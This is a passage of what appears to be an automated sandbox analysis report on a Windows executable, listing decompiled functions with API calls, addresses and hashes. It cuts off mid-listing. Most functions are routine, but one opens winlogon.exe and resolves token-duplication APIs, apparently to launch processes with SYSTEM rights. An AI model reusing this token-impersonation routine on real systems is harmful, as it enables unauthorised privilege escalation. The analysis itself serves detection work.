                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                                                                  • String ID: $
                                                                                                                                                                  • API String ID: 2142561256-3993045852
                                                                                                                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                                                                  0x00405b81
                                                                                                                                                                  0x00405b88
                                                                                                                                                                  0x00405b8a
                                                                                                                                                                  0x00405b8a
                                                                                                                                                                  0x00405b8f
                                                                                                                                                                  0x00405b96
                                                                                                                                                                  0x00405b9b
                                                                                                                                                                  0x00405bad
                                                                                                                                                                  0x00405bad
                                                                                                                                                                  0x00405b9d
                                                                                                                                                                  0x00405b9d
                                                                                                                                                                  0x00405ba8
                                                                                                                                                                  0x00405bab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405bab
                                                                                                                                                                  0x00405be9
                                                                                                                                                                  0x00405be9
                                                                                                                                                                  0x00405baf
                                                                                                                                                                  0x00405bb1
                                                                                                                                                                  0x00405ce2
                                                                                                                                                                  0x00405ce2
                                                                                                                                                                  0x00405bb7
                                                                                                                                                                  0x00405bbd
                                                                                                                                                                  0x00405bf6
                                                                                                                                                                  0x00405c4b
                                                                                                                                                                  0x00405c4c
                                                                                                                                                                  0x00405c52
                                                                                                                                                                  0x00405c53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405bf8
                                                                                                                                                                  0x00405c02
                                                                                                                                                                  0x00405c0e
                                                                                                                                                                  0x00405c13
                                                                                                                                                                  0x00405c18
                                                                                                                                                                  0x00405c2c
                                                                                                                                                                  0x00405c2e
                                                                                                                                                                  0x00405c3b
                                                                                                                                                                  0x00405c3c
                                                                                                                                                                  0x00405c42
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405c1a
                                                                                                                                                                  0x00405c25
                                                                                                                                                                  0x00405c2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405c2a
                                                                                                                                                                  0x00405c18
                                                                                                                                                                  0x00405bbf
                                                                                                                                                                  0x00405bc0
                                                                                                                                                                  0x00405bcd
                                                                                                                                                                  0x00405bce
                                                                                                                                                                  0x00405bd7
                                                                                                                                                                  0x00405c58
                                                                                                                                                                  0x00405c5f
                                                                                                                                                                  0x00405c61
                                                                                                                                                                  0x00405c61
                                                                                                                                                                  0x00405c63
                                                                                                                                                                  0x00405cdb
                                                                                                                                                                  0x00405cdb
                                                                                                                                                                  0x00405c65
                                                                                                                                                                  0x00405c65
                                                                                                                                                                  0x00405c74
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405c84
                                                                                                                                                                  0x00405c8a
                                                                                                                                                                  0x00405c8d
                                                                                                                                                                  0x00405c99
                                                                                                                                                                  0x00405caf
                                                                                                                                                                  0x00405cbd
                                                                                                                                                                  0x00405cc8
                                                                                                                                                                  0x00405cd4
                                                                                                                                                                  0x00405cd9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405cd9
                                                                                                                                                                  0x00405c74
                                                                                                                                                                  0x00405c63
                                                                                                                                                                  0x00405ce6

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                  • LoadStringW.USER32 ref: 00405C59
                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00403490), ref: 00405C99
                                                                                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                  • String ID: strings
                                                                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                                                                  0x00401e59
                                                                                                                                                                  0x00401e5c
                                                                                                                                                                  0x00401e64
                                                                                                                                                                  0x00401e67
                                                                                                                                                                  0x00401ef9
                                                                                                                                                                  0x00401e6d
                                                                                                                                                                  0x00401e70
                                                                                                                                                                  0x00401e76
                                                                                                                                                                  0x00401e79
                                                                                                                                                                  0x00401e7e
                                                                                                                                                                  0x00401e83
                                                                                                                                                                  0x00401e92
                                                                                                                                                                  0x00401e85
                                                                                                                                                                  0x00401e8e
                                                                                                                                                                  0x00401e8e
                                                                                                                                                                  0x00401e96
                                                                                                                                                                  0x00401ee6
                                                                                                                                                                  0x00401e98
                                                                                                                                                                  0x00401e9b
                                                                                                                                                                  0x00401e9e
                                                                                                                                                                  0x00401ea3
                                                                                                                                                                  0x00401ea8
                                                                                                                                                                  0x00401ebb
                                                                                                                                                                  0x00401eaa
                                                                                                                                                                  0x00401eb7
                                                                                                                                                                  0x00401eb7
                                                                                                                                                                  0x00401ebf
                                                                                                                                                                  0x00401ed3
                                                                                                                                                                  0x00401ec1
                                                                                                                                                                  0x00401ec7
                                                                                                                                                                  0x00401ec9
                                                                                                                                                                  0x00401ec9
                                                                                                                                                                  0x00401ed8
                                                                                                                                                                  0x00401ed8
                                                                                                                                                                  0x00401eeb
                                                                                                                                                                  0x00401eeb
                                                                                                                                                                  0x00401f01

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                                                                  • String ID: winlogon.exe
                                                                                                                                                                  • API String ID: 1315556178-961692650
                                                                                                                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                                                                  0x00405241
                                                                                                                                                                  0x00405250
                                                                                                                                                                  0x00405257
                                                                                                                                                                  0x0040525f
                                                                                                                                                                  0x00405262
                                                                                                                                                                  0x00405265
                                                                                                                                                                  0x00405268
                                                                                                                                                                  0x0040526f
                                                                                                                                                                  0x0040526f
                                                                                                                                                                  0x00405277
                                                                                                                                                                  0x00405277
                                                                                                                                                                  0x0040527a
                                                                                                                                                                  0x0040527f
                                                                                                                                                                  0x00405284
                                                                                                                                                                  0x00405285
                                                                                                                                                                  0x00405291
                                                                                                                                                                  0x00405296
                                                                                                                                                                  0x004052a9
                                                                                                                                                                  0x004052b3
                                                                                                                                                                  0x004052b7
                                                                                                                                                                  0x004052bc
                                                                                                                                                                  0x004052ca
                                                                                                                                                                  0x004052d2
                                                                                                                                                                  0x004052d5
                                                                                                                                                                  0x004052d8
                                                                                                                                                                  0x004052d8
                                                                                                                                                                  0x004052db
                                                                                                                                                                  0x004052db
                                                                                                                                                                  0x004052e1
                                                                                                                                                                  0x004052e4
                                                                                                                                                                  0x004052e8
                                                                                                                                                                  0x004052f2

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00405257
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                  • wcslen.MSVCRT ref: 00405291
                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),E80040CB,004034B5), ref: 004052A9
                                                                                                                                                                  • wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                  • memcpy.MSVCRT(?,004034B5,?,004034B5,?,?,?,?,?,00000400,%s (%s),E80040CB,004034B5), ref: 004052CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                  • String ID: %s (%s)
                                                                                                                                                                  • API String ID: 3979103747-1363028141
                                                                                                                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                                                                  0x00406157
                                                                                                                                                                  0x0040616d
                                                                                                                                                                  0x00406174
                                                                                                                                                                  0x0040617f
                                                                                                                                                                  0x00406185
                                                                                                                                                                  0x00406196
                                                                                                                                                                  0x0040619e
                                                                                                                                                                  0x004061b6
                                                                                                                                                                  0x004061bd
                                                                                                                                                                  0x004061d4
                                                                                                                                                                  0x004061da
                                                                                                                                                                  0x004061e0
                                                                                                                                                                  0x004061e5
                                                                                                                                                                  0x004061e6
                                                                                                                                                                  0x004061ef
                                                                                                                                                                  0x004061f9
                                                                                                                                                                  0x004061ff
                                                                                                                                                                  0x004061ef
                                                                                                                                                                  0x00406206

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                                  0x00404706
                                                                                                                                                                  0x00404714
                                                                                                                                                                  0x0040471c
                                                                                                                                                                  0x00404721
                                                                                                                                                                  0x0040472b
                                                                                                                                                                  0x00404733
                                                                                                                                                                  0x00404735
                                                                                                                                                                  0x00404735
                                                                                                                                                                  0x00404733
                                                                                                                                                                  0x00404751
                                                                                                                                                                  0x00404780
                                                                                                                                                                  0x00404753
                                                                                                                                                                  0x0040475e
                                                                                                                                                                  0x00404766
                                                                                                                                                                  0x0040476c
                                                                                                                                                                  0x00404770
                                                                                                                                                                  0x00404770
                                                                                                                                                                  0x0040478a

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                                                                  • wcslen.MSVCRT ref: 00404756
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                  • String ID: netmsg.dll
                                                                                                                                                                  • API String ID: 2767993716-3706735626
                                                                                                                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                                                                  0x0040598b
                                                                                                                                                                  0x0040598b
                                                                                                                                                                  0x0040599a
                                                                                                                                                                  0x004059ae
                                                                                                                                                                  0x004059b5
                                                                                                                                                                  0x004059c1
                                                                                                                                                                  0x004059c6
                                                                                                                                                                  0x004059cb
                                                                                                                                                                  0x004059ce
                                                                                                                                                                  0x00405a7b
                                                                                                                                                                  0x00405a7b
                                                                                                                                                                  0x004059d4
                                                                                                                                                                  0x004059d4
                                                                                                                                                                  0x004059dc
                                                                                                                                                                  0x004059ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004059f0
                                                                                                                                                                  0x004059f0
                                                                                                                                                                  0x004059f6
                                                                                                                                                                  0x004059f7
                                                                                                                                                                  0x004059fa
                                                                                                                                                                  0x00405a03
                                                                                                                                                                  0x00405a2b
                                                                                                                                                                  0x00405a2e
                                                                                                                                                                  0x00405a3c
                                                                                                                                                                  0x00405a40
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405a42
                                                                                                                                                                  0x00405a42
                                                                                                                                                                  0x00405a54
                                                                                                                                                                  0x00405a59
                                                                                                                                                                  0x00405a5a
                                                                                                                                                                  0x00405a5a
                                                                                                                                                                  0x00405a61
                                                                                                                                                                  0x00405a69
                                                                                                                                                                  0x00405a7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
